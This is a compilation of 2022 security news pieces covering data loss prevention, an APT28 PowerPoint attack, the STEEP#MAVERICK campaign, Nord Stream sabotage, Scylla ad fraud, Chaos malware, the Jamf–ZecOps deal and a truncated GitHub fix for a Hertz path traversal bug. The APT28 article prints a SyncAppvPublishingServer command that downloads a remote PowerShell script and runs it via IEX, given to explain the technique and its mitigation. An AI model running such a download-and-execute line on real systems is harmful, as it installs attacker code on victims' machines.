The average cost of a data-exposing cybersecurity incident is $4.35 million. If your business can’t avoid to pay, make sure you’ve got a strong data loss prevention practice in place.

$4.35 million. That's the average total cost of a data-exposing cybersecurity incident, according to the Ponemon Institute's "Cost of a Data Breach Report 2022." That's an all-time high, up 12.7% from 2020.

Between the potential loss of trade secrets, reputational harm, and regulatory fines related to data privacy, data breaches can threaten an organization's very existence. And if you don't take proactive measures to prevent them, the circumstances that led to one breach can easily result in another. Eighty-three percent of breached organizations report having suffered more than one such event.

Data loss prevention, or DLP, refers to a category of cybersecurity solutions that are specifically **designed to detect and prevent data breaches, leaks, and destruction**. These solutions do so by applying a combination of data flow controls and content analysis. And in today's cyber-threat landscape, DLP has become a basic business need.

**The Three States of Data and How DLP Protects Them**

There are **three main states** in which data can reside within an organization:

*   **Data in use**:**** Data is considered to be _in use_ when it's being accessed or transferred, either via local channels (e.g., peripherals and removable storage) or applications on the endpoint. An example could be files that are being transferred from a computer to an USB drive.
*   **Data in motion**:**** Data is considered to be _in motion_ when it's moving between computer systems. For example, data that is being transferred from local file storage to cloud storage, or from one endpoint computer to another via instant messenger or email.
*   **Data at rest**:**** Data is considered to be _at_ rest when it's stored, either locally or elsewhere on the network, and is not currently being accessed or transferred.

Of course, most sensitive data will change between these states frequently — in some cases, almost continuously — though there are use cases where data may remain in a single state for its entire life cycle at an endpoint.

Similarly, there are three primary "functional" DLP types, each dedicated to protecting one of these states of data. Here are just some examples of how this can work:

*   **Data-in-use DLP** systems may monitor and flag unauthorized interactions with sensitive data, such as attempts to print it, copy/paste to other locations, or capture screenshots.
*   **Data-in-motion DLP** detects whether an attempt is being made to transfer (confidential) data outside of the organization. Depending on your organization's needs, this can include _potentially_ unsafe destinations, such as USB drives or cloud-based applications.
*   **Data-at-rest DLP** enables a holistic view of the location of sensitive data on a local endpoint or network. This data can then be deleted (if it's out of place), or certain users' access to it blocked depending on your security policies.

Not all potential sources of a data breach are nefarious — they're often the result of good old-fashioned human error. Still, the impact is just as real whether sensitive information is intentionally stolen or simply misplaced.

**DLP Architecture Types**

DLP solutions can be categorized based on their architectural design:

*   **Endpoint DLP** solutions use endpoint-based DLP agents to prevent data in use, data in motion, and data at rest from leaking — regardless of whether they're used solely within a corporate network or exposed to the Internet.
*   **Network/cloud DLP** solutions use only network-resident components — such as hardware/virtual gateways — to protect data in motion or at rest.
*   **Hybrid DLP** solutions utilize both network- and endpoint-based DLP components to perform the functionality of both endpoint and network DLP architectures.

It's important to note that due to the nature of their architecture, network DLP solutions cannot effectively safeguard data in use: It remains vulnerable to purely local activities, like unauthorized printing and screen capturing.

**Adopting DLP Is More Important Than Ever**

The benefits of a strong DLP program are clear. By taking proactive steps to slash the risk of data loss and leakage, organizations can achieve some powerful benefits:

*   More easily achieving and maintaining compliance with relevant data privacy regulations, such as the GDPR and HIPAA
*   Protecting intellectual property and trade secrets
*   Strengthening security in an era of widespread remote work and BYOD policies
*   Minimizing the potential impact of human error and negligence

Larger enterprises may choose to adopt on-premises DLP solutions — and for some, this may be the right choice. But setting up a successful DLP program is complex and resource-intensive, and it requires fine-tuning over an extended period of time. Businesses will also need to bring aboard specialized experts with relevant experience. Those without such a team already in place will likely find it more efficient to work with a managed service provider (MSP) for their DLP needs.

In turn, MSPs are turning to partners to help them build out these Advanced DLP offerings to help prevent data leakage from clients' workloads.

Whether you manage your DLP in-house or turn to a vendor to help, it is a critical part of a modern, and future, security stack.

**About the Author**

    

Iliyan Gerov is a Senior Product Marketing Specialist at Acronis.

Plug Your Data Leaks: Integrating Data Loss Prevention into Your Security Stack

Categories: News
Tags: APT28

Tags:  Fancy Bear

Tags:  PowerPoint

Tags:  PowerShell

Tags:  One Drive

Tags:  SyncAppvPublishingServer

The Russian APT known as Fancy Bear was caught using an old mouseover technique that doesn't need macros



(Read more...)




The post APT28 attack uses old PowerPoint trick to download malware appeared first on Malwarebytes Labs.

Researchers at Cluster25 have published research about exploit code that's triggered when a user moves their mouse over a link in a booby-trapped PowerPoint presentation.

The code starts a PowerShell script that downloads and executes a dropper for Graphite malware.

Graphite is named after Microsoft's Graph API, which it uses to access command and control (C2) resources on Microsoft OneDrive. This type of communication allows the malware to avoid detection for longer, because it only connects to legitimate Microsoft domains.

The attack was attributed to the Russian APT28 group, also known as Sofacy or Fancy Bear, a notorious Russian threat actor that has been active since at least 2004. Its main activity is collecting intelligence for the Russian government. The group is known to have targeted US politicians, organizations, and even nuclear facilities.

Cluster25 indicates that entities and individuals in the defense and government sectors of European countries may have been the potential targets of this campaign. But, as we always say, attribution is hard, and thinking you aren't a target isn't a good defense strategy.

**Malicious mouseover**

The technique used in this attack does not require macros to be enabled. It uses the Windows native SyncAppvPublishingServer utility, which is triggered by simply hovering over a hyperlink.

Basically, hovering over a mouse can be used to trigger:

SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://example.org/malice.ps1') | IEX"

Which downloads a script—malice.ps1 in my example—which can be used to execute malicious code on the affected system.

In the example discovered by Cluster25, the malicious link triggered a PowerShell script that downloaded a DLL file from OneDrive, disguised with a .jpeg extension. The file was later decrypted and written to the local path C:\ProgramData\lmapi2.dll. The script also added a registry key to execute the DLL via rundll32.exe for persistence.

The victim does not need administrator access to trigger a successful attack. This technique is by no means new—it was spotted spreading malware five years ago, in 2017.

**Mitigation**

SyncAppvPublishingServer has no business running unless the Application Virtualization (App-V) for Windows client is active on the system. App-V delivers Win32 applications to users as virtual applications, which are installed on centrally managed servers and delivered as a service in real time, on an as-needed basis. Users launch and interact with virtual applications as if they are installed locally.

So, unless you are using this functionality, it is safe to block SyncAppvPublishingServer.exe. Also, Microsoft Office's Protected View should stop the code from executing. Protected View is enabled by default and should not be disabled. You can check this by opening an Office file and clicking on **File > Options,** then **Trust Center > Trust Center Settings > Protected View** to view the active settings.

**Malwarebytes**

Malwarebytes users are protected against this attack.

Our web protection module blocks the One Drive URLs and our Real-time Protection module detects lmapi2.dll as Trojan.Downloader.

APT28 attack uses old PowerPoint trick to download malware

Malware used in the STEEP#MAVERICK campaign features rarely seen obfuscation, anti-analysis, and evasion capabilities.

A cyberattack campaign, potentially bent on cyber espionage, is highlighting the increasingly sophisticated nature of cyberthreats targeting defense contractors in the US and elsewhere.

The covert campaign, which researchers at Securonix detected and are tracking as STEEP#MAVERICK, has hit multiple weapons contractors in Europe in recent months, including potentially a supplier to the US F-35 Lightning II fighter aircraft program.

What makes the campaign noteworthy according to the security vendor is the overall attention the attacker has paid to operations security (OpSec) and to ensuring their malware is hard to detect, difficult to remove, and challenging to analyze. 

The PowerShell-based malware stager used in the attacks have "featured an array of interesting tactics, persistence methodology, counter-forensics and layers upon layers of obfuscation to hide its code," Securonix said in a report this week.

**Uncommon Malware Capabilities**

The STEEP#MAVERICK campaign appears to have launched in late summer with attacks on two high-profile defense contractors in Europe. Like many campaigns, the attack chain began with a spear-phishing email that contained a compressed (.zip) fie with a shortcut (.lnk) file to a PDF document purportedly describing company benefits. Securonix described the phishing email as being similar to one it had encountered in a campaign earlier this year involving North Korea's APT37 (aka Konni) threat group.

When the .lnk file is executed, it triggers what Securonix described as a "rather large and robust chain of stagers," each written in PowerShell and featuring as many as eight obfuscation layers. The malware also features extensive anti-forensic and counter-debugging capabilities which include monitoring a long list of processes that could be uses to look for malicious behavior. The malware is designed to disable logging and bypass Windows Defender. It uses several techniques to persist on a system, including by embedding itself in the system registry, by embedding itself as a scheduled task and by creating a startup shortcut on the system.

A spokesperson with Securonix's Threat Research Team says the number and variety of anti-analysis and anti-monitoring checks the malware has is unusual. So, too, is the large number of obfuscation layers for payloads and the malware's attempts to substitute or generate new custom command-and-control (C2) stager payloads in response to analysis attempts: "Some obfuscation techniques, such as using PowerShell get-alias to perform \[the invoke-expression cmdlet\] are very rarely seen."

The malicious activities were performed in an OpSec-aware manner with different types of anti-analysis checks and evasion attempts throughout the attack, at a relatively high operational tempo with custom payloads injected. 

"Based on the details of the attack, one takeaway for other organizations is paying extra attention to monitoring your security tools," the spokesperson says. "Organizations should ensure security tools work as expected and avoid relying on a single security tool or technology to detect threats."

**A Growing Cyber Threat**

The STEEP#MAVERICK campaign is only the latest in a growing number that have targeted defense contractors and suppliers in recent years. Many of these campaigns have involved state-backed actors operating out of China, Russia, North Korea, and other countries. 

In January, for instance, the US Cybersecurity and Infrastructure Security Agency (CISA) issued an alert warning of Russian state-sponsored actors targeting so-called cleared defense contractors (CDCs) in attacks designed to steal sensitive US defense information and technology. The CISA alert described the attacks as targeting a wide swath of CDCs, including those involved in developing combat systems, intelligence and surveillance technologies, weapons and missile development, and combat vehicle and aircraft design.

In February, researchers at Palo Alto Networks reported on at least four US defense contractors being targeted in a campaign to distribute a fileless, socketless backdoor called SockDetour. The attacks were part of a broader campaign that the security vendor had investigated along with the National Security Agency in 2021 involving a Chinese advanced persistent group that targeted defense contractors and organizations in multiple other sectors.

**Defense Contractors: A Vulnerable Segment**

Adding to the concerns over the rising volume of cyberattacks is the relative vulnerability of many defense contractors, despite having secrets that should be closely guarded. 

Recent research that Black Kite conducted into the security practices of the top 100 US defense contractors showed that nearly a third (32%) are vulnerable to ransomware attacks. This is because of factors like leaked or compromised credentials, and weak practices in areas such as credential management, application security and Security Sockets Layer/Transport Layer Security. 

Seventy-two percent of the respondents in the Black Kite report have experienced at least one incident involving a leaked credential.

There could be light at the end of the tunnel: The US Department of Defense, in conjunction with industry stakeholders, has developed a set of cybersecurity best practices for military contractors to use to protect sensitive data. Under the DoD's Cybersecurity Maturity Model Certification program, defense contractors are required to implement these practices — and get certified as having them — to be able to sell to government. The bad news? The rollout of the program has been delayed.

Sophisticated Covert Cyberattack Campaign Targets Military Contractors

Damage to the pipeline that runs between Russia and Germany is being treated as deliberate. Finding out what happened may not be straightforward.

The Nord Stream gas pipelines are colossal pieces of infrastructure. Running more than 1,200 kilometers from Russia, across the Baltic Sea to Germany, the pipes can carry up to 110 billion cubic meters of gas, enough for 26 million homes. The Nord Stream 1 pipeline alone is constructed of 202,000 huge pieces of piping. Each section is 12 meters long and contains piping that uses around 4 centimeters of steel, which is covered with 11 centimeters of concrete. The pipes are not built to break.

So when the pressure in one of the Nord Stream pipes dropped on June 26, alarm bells started ringing. Danish authorities told ships to steer clear of the pipes as methane gas was bubbling into the sea. Hours later, two more leaks were detected, one in Nord Stream 2 and a second in Nord Stream 1. Now, authorities are suspecting foul play. “We are not talking about an accident,” Mette Frederiksen, the Danish prime minister said.

Ursula von der Leyen, head of the European Commission, believes the leaks may be a result of “sabotage” and said any “deliberate disruption” of energy infrastructure will “lead to the strongest possible response.” NATO officials agree; the US has pledged its support to help Europe find out what happened. However, the incidents have raised fears about attacks on critical infrastructure and the security protections in place around systems that can provide the world’s fuel. The incident comes on top of Russia reducing its supply of gas to Europe, with large parts of the continent facing winter energy crises.

While officials have indicated the leaks may have been caused deliberately, very little evidence about the attacks has emerged so far. Military flights over the region show gas bubbling at the surface more than a kilometer wide, and Swedish seismic experts say they are convinced explosions took place after they recorded tremors equal to a magnitude 2.3 earthquake.

Fingers immediately pointed at Russia, which partly owns the pipes. Ukraine has said it is a “terrorist attack,” and German newspaper _Der Spiegel_ reported that the CIA warned German officials about possible attacks against Baltic pipelines several weeks ago. (Right-wing commentators in the US and one Polish MP accused the US of being involved after President Joe Biden said, in February, he would “put an end” to Nord Stream 2 if Russia invaded Ukraine.)

"It's a very classic Russian hybrid warfare approach,” says Hans Tino Hansen, the CEO of Risk Intelligence, a Denmark-based security firm that deals with maritime issues. Hansen says if Russia did attack the Nord Stream pipelines it would show they have “complete deniability.” Because Russia partly owns the Nord Stream infrastructure, it makes people question why it would be behind any attacks against it. (The Kremlin claimed suggestions it is behind the leaks are “stupid.) “They are showing that they can attack seabed energy infrastructure, with the pipelines, which then sends the signal that they can attack and destroy any energy infrastructure in Europe," Hansen says.

Investigators across Europe, including intelligence agencies, will now be trying to piece together exactly who and what caused the apparent explosions. This is likely to involve multiple steps, such as examining what data is held about the area, including seismic data and other sensors, checking whether any communications around the incident have been intercepted, and examining the pipelines to see if there are any signs of intentional destruction.

Neither of the pipes is operational—Nord Stream 1 was paused for repairs in August and Nord Stream 2 has not officially opened after Germany pulled support for it ahead of Russia’s full-scale invasion of Ukraine in late February—but both pipes are holding gas. All three leaks happened relatively close to each other, near the Danish island of Bornholm, in the Baltic sea. The island is surrounded by Denmark to the west, Sweden to the north, and both Germany and Poland to the south. The leaks are in international waters, but also sit in both Denmark and Sweden’s exclusive economic zones. “It's quite shallow, around 50 meters on average in this region,” says Julian Pawlak, a research associate at the Helmut Schmidt University and the German Institute for Defence and Strategic Studies.

Security sources have speculated if the attacks were deliberate, they could have been conducted by unmanned underwater drones, involve mines being dropped or planted by boats, been carried out by divers, or even from within the pipes themselves. “We still don't know what the origin is of those explosions or where they came from—if they originated from the outside or if they originated from the inside of the pipelines,” Pawlak says. In a process called “pigging,” cleaning and inspection machines can be sent down the pipes from Russia in the direction of Germany. It’s possible pigging was repurposed to carry out an attack.

Back in 2007, before the first Nord Stream pipeline was constructed, a review of the project by the Swedish Defence Research Agency (FOI) warned about potential explosions around the pipe, in the context of terrorism. “Despite its concrete coating, a pipeline is rather vulnerable, and one diver would be enough to set an explosive device,” its report said. “However, the impact of such an assault would probably be rather modest and most likely a minor incident of this type would not result in a large explosion.”

"They \[Russia\] have the capability for subsea warfare, with the divers, but also with mini-submarines and drones,” Hansen says. However, confirming any responsibility isn’t necessarily straightforward. The relatively shallow depth of the area around the Nord Stream pipes means it is unlikely that any large submarines would have been operating nearby, as they would be easy to detect.

Pawlak says any vessels in the area could potentially detect others that may have caused the damage. Undersea sensors could equally spot something in the area moving, but it is unclear where any of these systems are. “It's still not the case that all of the Baltic Sea is filled up with sensors and that NATO knows every movement,” Pawlak says. “On the surface, but especially on the seabed, it's still not possible to know, at every time, at every place, what's moving, what's going on.”

However, the Nord Stream incidents draw into focus the protections that are placed around critical infrastructure. In recent years, cyberattacks have shut down the US Colonial Pipeline, cutting off fuel supplies. And ahead of Russia’s full-scale invasion of Ukraine, its military hackers used the country as a cyberwarfare testing ground, shutting down power grids with their code.

Undersea infrastructure can be particularly vulnerable to damage—either from natural causes, such as earthquakes, or physical attacks. Since the Nord Stream pipes burst on Tuesday huge volumes of gas have poured into the sea, potentially causing an “unprecedented” environmental impact. "As we—and many others—have been saying for many years, we need to address the security of energy infrastructure and also everything subsea,” Hansen says. This includes the myriad of internet cables stretching thousands of kilometers around the world and keeping billions of people online.

In January, the head of the UK’s armed forces warned that Russian submarines have been threatening subsea cables. “Russia has grown the capability to put at threat those undersea cables and potentially exploit those undersea cables,” Admiral Tony Radakin said.

Hansen says there are two starting points for protecting subsea infrastructure: first, building out ways to detect faults and issues with equipment automatically and then also making sure there is equipment, such as underwater drones, that are able to scramble to sites to inspect them when damage has happened. Those steps may already be underway, with Norway’s prime minister saying the country will up the military protection of its energy infrastructure.

The Race to Find the Nord Stream Saboteurs

By Waqas
Before being removed, the Scylla ad fraud campaign used over 90 malicious apps to carry out its operation against Android and iOS users.
This is a post from HackRead.com Read the original post: Scylla Ad Fraud Attack on iOS and Android Users Halted by Apple and Google

The Satori Threat Intelligence and Research Team at Human identified a new wave of cyberattacks involving the use of malicious applications against iOS and Android users. The alarming fact is that these infected apps boast millions of downloads.

The good news is that the attack has been halted by Apple and Google after their prompt response to the researchers.

**Malicious Apps Found on Legitimate Platforms**

Reportedly, 89 malicious apps were discovered and used in a mobile fraud ad campaign. The apps collectively boasted around 13 million downloads. The researchers have dubbed this campaign Scylla.

Per their research, this campaign is the third installment of the Poseidon fraud campaign discovered in 2019, and its second installment was named Charybdis, which was detected in 2020.

You may be wondering where have you heard the term Scylla and Charybdis before. “Being between Scylla and Charybdis” is an idiom deriving from Greek mythology, which has been associated with the proverbial advice “to choose the lesser of two evils”.

In Greek mythology, Scylla and Charybdis were two monsters who lived on either side of a narrow channel of water. Scylla was a six-headed monster (_also featured in the TV series Prison Break_) who lived on a rock in the middle of the channel. Charybdis was a whirlpool who lived on the other side of the channel.

As for the malicious campaign, out of these 89 apps, 89 are Android, and 9 are iOS-based apps. The malicious apps perform ad fraud via hidden apps, spoofing, and fake clicks. What makes Scylla different from the earlier two mobile fraud campaigns is that this time the attackers have found a way to target iOS devices too.

**More Android Malware News**

1.  New malware targeting IoT devices, Android TV globally
2.  LG Smart TV Screen Bricked in Android Ransomware Attack
3.  Top 10 Android Educational Apps That Collect Most User Data?
4.  Fake Banking Rewards Apps Install Malware on Android Phones
5.  Hacked Android phones mimicked TV products for fake ad views

**Campaign Analysis**

According to the company’s blog post, just like the Charybdis campaign, the apps used in Scylla also contained obfuscated code. The attack mechanism is also somewhat the same as the apps target advertising software development kits/SDKs.

One of the iOS apps called “Wood Sculptor,” linked to the Scylla ad fraud campaign (Source: Satori Threat Intelligence and Research Team)

It is worth noting that some apps contained code that posed as completely different when observed by advertisers and ad tech firms.

> “These tactics, combined with the obfuscation techniques first observed in the Charybdis operation, demonstrate the increased sophistication of the threat actors behind Scylla.”
> 
> Satori Threat Intelligence and Research Team

**Application Detailed Overview**

Human researchers detected 29 Android apps posed as more than six thousand CTV-based apps to encourage higher ad proceeds than mobile games. Conversely, some apps contained code that informed advertisers of the ads they displayed to the user.

This means the code rendered ads after the apps were closed, such as when the home screen was on. Some apps captured the information about what ads the user clicked on and transferred the info to advertisers as a fake click. Most of the malicious apps were games.

Google and Apple were promptly informed about malicious apps’ presence and quickly removed from their respective platforms. Advertising SDK developers were also informed about the attack.

Human also published a list of malicious apps and urged users to remove them if installed on their devices. To remove these apps, just tap and hold the App and tap on the Remove option. Then tap on Delete App.

**More iOS Malware News**

1.  SolarWinds hackers exploited iOS 0-day to hack iPhones
2.  Malicious SDK spying, defrauding users through iOS apps
3.  Facebook removes accounts for iOS, and Android malware
4.  Fake Covid-19 apps hit Android and iOS users with spyware
5.  Install Malware on iPhone When it is Powered Off – Research

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Scylla Ad Fraud Attack on iOS and Android Users Halted by Apple and Google

The previously identified ransomware builder has veered in an entirely new direction, targeting consumers and business of all sizes by exploiting known CVEs through brute-forced and/or stolen SSH keys.

The powerful Chaos malware has evolved yet again, morphing into a new Go-based, multiplatform threat that bears no resemblance to its previous ransomware iteration. It's now targeting known security vulnerabilities to launch distributed denial-of-service (DDoS) attacks and perform cryptomining.

Researchers from Black Lotus Labs, the threat intelligence arm of Lumen Technologies, recently observed a version of Chaos written in Chinese, leveraging China-based infrastructure, and exhibiting behavior far different than the last activity seen by the ransomware-builder of the same name, they said in a blog post published Sept. 28.

Indeed, the distinctions between earlier variants of Chaos and the 100 distinct and recent Chaos clusters that researchers observed are so different that they say it poses a brand-new threat. In fact, researchers believe the latest variant is actually the evolution of the DDoS botnet Kaiji and perhaps "distinct from the Chaos ransomware builder" previously seen in the wild, they said.

Kaiji, discovered in 2020, originally targeted Linux-based AMD and i386 servers by leveraging SSH brute-forcing to infect new bots and then launch DDoS attacks. Chaos has evolved Kaiji's original capabilities to include modules for new architectures — including Windows — as well as adding new propagation modules through CVE exploitation and SSH key harvesting, the researchers said.

**Recent Chaos Activity**

In recent activity, Chaos successfully compromised a GitLab server and unfurled a flurry of DDoS attacks targeting the gaming, financial services and technology, and media and entertainment industries, along with DDoS-as-a-service providers and a cryptocurrency exchange.

Chaos is now targeting not only enterprise and large organizations but also "devices and systems that aren't routinely monitored as part of an enterprise security model, such as SOHO routers and FreeBSD OS," the researchers said.

And while the last time Chaos was spotted in the wild it was acting more as typical ransomware that entered networks with the purpose of encrypting files, the actors behind the latest variant have very different motives in mind, the researchers said.

Its cross-platform and device functionality as well as the stealth profile of the network infrastructure behind the latest Chaos activity appears to demonstrate that the aim of the campaign is to cultivate a network of infected devices to leverage for initial access, DDoS attacks, and cryptomining, according to the researchers.

**Key Differences, and One Similarity**

While previous samples of Chaos were written in .NET, the latest malware is written in Go, which is rapidly becoming a language of choice for threat actors due to its cross-platform flexibility, low antivirus detection rates, and difficulty to reverse-engineer, the researchers said.

And indeed, one of the reasons that the latest version of Chaos is so powerful is because it operates across multiple platforms, including not only Windows and Linux operating systems but also ARM, Intel (i386), MIPS, and PowerPC, they said.

It also propagates in a far different way than previous versions of the malware. While researchers were unable to ascertain its initial access vector, once it takes hold of a system, the latest Chaos variants exploit known vulnerabilities in a way that shows the ability to pivot quickly, the researchers noted.

"Among the samples we analyzed were reported CVEs for Huawei (CVE-2017-17215) and Zyxel (CVE-2022-30525) personal firewalls, both of which leveraged unauthenticated remote command line injection vulnerabilities," they observed in their post. "However, the CVE file appears trivial for the actor to update, and we assess it is highly likely the actor leverages other CVEs."

Chaos has indeed gone through numerous incarnations since it first emerged in June 2021 and this latest version is not likely to be its last, the researchers said. Its first iteration, Chaos Builder 1.0-3.0, purported to be a builder for a .NET version of the Ryuk ransomware, but the researchers soon noticed it bore little resemblance to Ryuk and was actually a wiper.

The malware evolved across several versions until version four of the Chaos builder that was released in late 2021 and got a boost when a threat group named Onyx created its own ransomware. This version quickly became the most common Chaos edition directly observed in the wild, encrypting some files but maintain overwritten and destroying most of the files in its path.

Earlier this year in May, the Chaos builder traded its wiper capabilities for encryption, surfacing with a rebranded binary dubbed Yashma that incorporated fully fledged ransomware capabilities.

While the most recent evolution of Chaos witnessed by Black Lotus Labs is far different, it does have one significant similarity with its predecessors — rapid growth that is unlikely to slow anytime soon, the researchers said.

The earliest certificate of the latest Chaos variant was generated on April 16; this is subsequently when researchers believe threat actors launched the new variant in the wild.

Since then, the number of Chaos self-signed certificates has shown "marked growth," more than doubling in May to 39 and then jumping to 93 for the month of August, the researchers said. As of Sept. 20, the current month has already surpassed the previous month's total with the generation of 94 Chaos certificates, they said.

**Mitigating Risk Across the Board**

Because Chaos is now attacking victims from the smallest home offices to the largest enterprises, researchers made specific recommendations for each type of target.

For those defending networks, they advised that network administrators stay on top of patch management for newly discovered vulnerabilities, as this is a principal way Chaos spreads.

"Use the IoCs outlined in this report to monitor for a Chaos infection, as well as connections to any suspicious infrastructure," the researchers recommended.

Consumers with small office and home office routers should follow best practices of regularly rebooting routers and installing security updates and patches, as well as leveraging properly configured and updated EDR solutions on hosts. These users also should regularly patch software by applying vendors' updates where applicable.

Remote workers — an attack surface that has significantly increased over the last two years of the pandemic — also are at risk, and should mitigate it by changing default passwords and disabling remote root access on machines that don't require it, the researchers recommended. Such workers also should store SSH keys securely and only on devices that require them.

For all businesses, Black Lotus Labs recommends considering the application of comprehensive secure access service edge (SASE) and DDoS mitigation protections to bolster their overall security postures and enable robust detection on network-based communications.

Chaos Malware Resurfaces With All-New DDoS & Cryptomining Modules

ZecOps extends Jamf's mobile security capabilities by adding advanced detections and incident response.

**MINNEAPOLIS, Sept. 26, 2022 (GLOBE NEWSWIRE) —** Jamf (NASDAQ: JAMF), the standard in Apple Enterprise Management, today announced it signed a definitive agreement to acquire ZecOps Inc., a leader in mobile detection and response.

This acquisition uniquely positions Jamf to help IT and security teams strengthen their organization's mobile security posture, accelerating mobile security investigations from weeks to minutes, leverage known indicators of compromise (IOC) at-scale, and identify sophisticated 0- or 1-click attacks on a much deeper scale.

"I am very excited to bring ZecOps' market-leading advanced mobile detection and response capabilities into the Jamf platform," said Dean Hager, CEO, Jamf. "We believe ZecOps has built a differentiated solution that meets a very important need for many organizations — the ability to thoroughly detect and investigate threats that target mobile users so they can confidently use these powerful devices for work. This capability further propels our goal of continuing to bridge the gap between what Apple provides and the enterprise requires."

Mobile devices now account for 59% of global website traffic, and according to the 2022 Verizon Mobile Security Index, close to half (45%) of companies said that they have suffered a compromise involving a mobile device in the past 12 months.

ZecOps will bring important capabilities to the Jamf platform to help address the growing trend of targeted mobile attacks. Jamf offers robust management and mobile security capabilities for iOS devices; however, access to deeper insights into potential security exploits is technically challenging and requires physical access to the device, which is difficult in a remote work environment. ZecOps is a robust, unparalleled solution that provides the deepest layer of insight and assurance for security-conscious customers with high-value targets that need something more. ZecOps provides the same level of visibility currently available for macOS through Jamf Protect but for iOS, making it capable of detecting the kinds of sophisticated mobile threats that Apple's Lockdown mode aims to prevent. With ZecOps, users can have both Lockdown mode and ZecOps software operating at the same time.

**Advanced threat hunting on mobile devices**  
Advanced protection of mobile devices requires a layered approach. Proactive investigation and analysis complement device management and mobile threat defense for more advanced detections and preventative protections. ZecOps enables advanced threat hunting by capturing and analyzing logs from iOS and Android devices at the operating system layer, allowing security operations and incident response teams to perform automatic or on-demand mobile cyber investigations.

**Digital forensics and incident response**  
Security teams are already drowning in data. Event logs, analyst reports, third-party threat intelligence feeds, and more are produced regularly for applications, endpoints, and network infrastructure. Mobile has historically been left out of this data feed. Many investigation teams lack expertise in modern mobile platforms. ZecOps' sophisticated digital forensics capabilities provides Security Operation Center (SOC) teams with unique mobile threat intelligence to uncover zero-day attacks. ZecOps does the heavy lifting for SOC teams, saving months of work per investigation. The solution automatically constructs a timeline of suspicious events and indicators of compromise to demonstrate when and how a device was impacted.

**Privacy conscious**  
Data privacy is extremely important to Jamf. ZecOps shares Jamf's commitment to safeguarding user data by ensuring log collection doesn't include the user's material personal data such as photos, videos, text messages and call logs, and only leveraging low-level system information and diagnostics data to the cloud for analysis. ZecOps analysis can also take place on-premises to meet various organizations' and governments data privacy requirements.

"We founded ZecOps to catch hidden 0-click and 1-click attacks," said Zuk Avraham, co-founder and CEO, ZecOps. "By combining with Jamf, we can offer our customers a truly powerful mobile threat intelligence and threat hunting capabilities that will keep up with the evolving threat landscape without compromising the user experience."

This transaction is subject to the satisfaction of customary closing conditions and is expected to close in the fourth quarter. Terms of the transaction were not disclosed.

**About Jamf**  
Jamf's purpose is to simplify work by helping organizations manage and secure an Apple experience that end users love and organizations trust. Jamf is the only company in the world that provides a complete management and security solution for an Apple-first environment that is enterprise secure, consumer simple and protects personal privacy. To learn more, visit www.jamf.com.

**About ZecOps**  
ZecOps develops the world's most powerful platform to discover and analyze mobile cyber attacks. Used by world-leading enterprises, governments and individuals globally, ZecOps Mobile Detection and Response platform provides a realistic and scalable approach to mobile threat hunting. ZecOps enables automated discovery of 0-day attacks and Advanced Persistent Threats (APTs), delivering anti cyber-espionage capabilities within minutes.

**Forward-Looking Statements**  
This release relates to a pending acquisition of ZecOps, Inc. ("ZecOps") by Jamf Holding Corp. ("Jamf", "we", our" or "us"). This release contains forward-looking statements within the meaning of the "safe harbor" provisions of the Private Securities Litigation Reform Act of 1995, regarding the anticipated benefits of the acquisition, and the anticipated impacts of the acquisition on our business, products, financial results, and other aspects of our and ZecOps' operations. You can identify forward-looking statements by the fact that they do not relate strictly to historical or current facts. These statements may include words such as "anticipate," "estimate," "expect," "project," "plan," "intend," "believe," "may," "will," "should," "can have," "likely," and other words and terms of similar meaning in connection with any discussion of the timing or nature of future operating or financial performance or other events. These risks, uncertainties, assumptions, and other factors include, but are not limited to: the effect of the announcement of the acquisition on the ability of Jamf or ZecOps to retain key personnel or maintain relationships with customers, vendors, developers, community members, and other business partners; risks that the acquisition disrupts current plans and operations; the ability of the parties to consummate the acquisition on a timely basis or at all; the satisfaction of the conditions precedent to consummation of the acquisition; our ability to successfully integrate ZecOps' operations; our and ZecOps' ability to execute on our business strategies relating to the acquisition and realize expected benefits and synergies; and our ability to compete effectively, including in response to actions our competitors may take following announcement of the acquisition. Further information on these and additional risks, uncertainties, and other factors that could cause actual outcomes and results to differ materially from those included in or contemplated by the forward-looking statements contained in this release are included under the caption "Forward-Looking Statements" and elsewhere in our Form 10-Q for the quarter ended June 30, 2022, and other filings and reports we make with the Securities and Exchange Commission from time to time. Moreover, both we and ZecOps operate in a very competitive and rapidly changing environment, and new risks may emerge from time to time. It is not possible for us to predict all risks, nor can we assess the impact of all factors on our business or the acquisition, or the extent to which any factor, or combination of factors, may cause actual results or outcomes to differ materially from those contained in any forward-looking statements we may make. Forward-looking statements speak only as of the date the statements are made and are based on information available to us at the time those statements are made and/or our management's good faith belief as of that time with respect to future events. Except as required by law, we undertake no obligation, and do not intend, to update these forward-looking statements.

SOURCE: Jamf

Jamf Announces Intent to Acquire ZecOps, to Provide a Market-Leading Security Solution for Mobile Devices as Targeted Attacks Continue to Grow

Hertz v0.3.0 ws discovered to contain a path traversal vulnerability via the normalizePath function.

Copy link

Contributor

** **ruokeqx** commented Sep 4, 2022 •**

**What type of PR is this?**

fix: A bug fix

**Check the PR title.**

*   This PR title match the format: (optional scope):
    
*   The description of this PR title is user-oriented and clear enough for others to understand.
    

**(Optional) Translate the PR title into Chinese.**

修复目录穿越漏洞

**(Optional) More detail description for this PR(en: English/zh: Chinese).**

en: fix by simply replace all backslashes with forward slashes  
zh(optional): 将反斜杠全部改成正斜杠

**Which issue(s) this PR fixes:**

Fixes #228

Currently hertz has no restriction on backslash in normalizePath function.

func normalizePath(dst, src \[\]byte) \[\]byte {
	dst \= dst\[:0\]
	dst \= addLeadingSlash(dst, src)
	dst \= decodeArgAppendNoPlus(dst, src)

	// remove duplicate slashes
	b := dst
	bSize := len(b)
	for {
		n := bytes.Index(b, bytestr.StrSlashSlash)
		if n < 0 {
			break
		}
		b \= b\[n:\]
		copy(b, b\[1:\])
		b \= b\[:len(b)\-1\]
		bSize\--
	}
	dst \= dst\[:bSize\]

	// remove /./ parts
	b \= dst
	for {
		n := bytes.Index(b, bytestr.StrSlashDotSlash)
		if n < 0 {
			break
		}
		nn := n + len(bytestr.StrSlashDotSlash) \- 1
		copy(b\[n:\], b\[nn:\])
		b \= b\[:len(b)\-nn+n\]
	}

	// remove /foo/../ parts
	for {
		n := bytes.Index(b, bytestr.StrSlashDotDotSlash)
		if n < 0 {
			break
		}
		nn := bytes.LastIndexByte(b\[:n\], '/')
		if nn < 0 {
			nn \= 0
		}
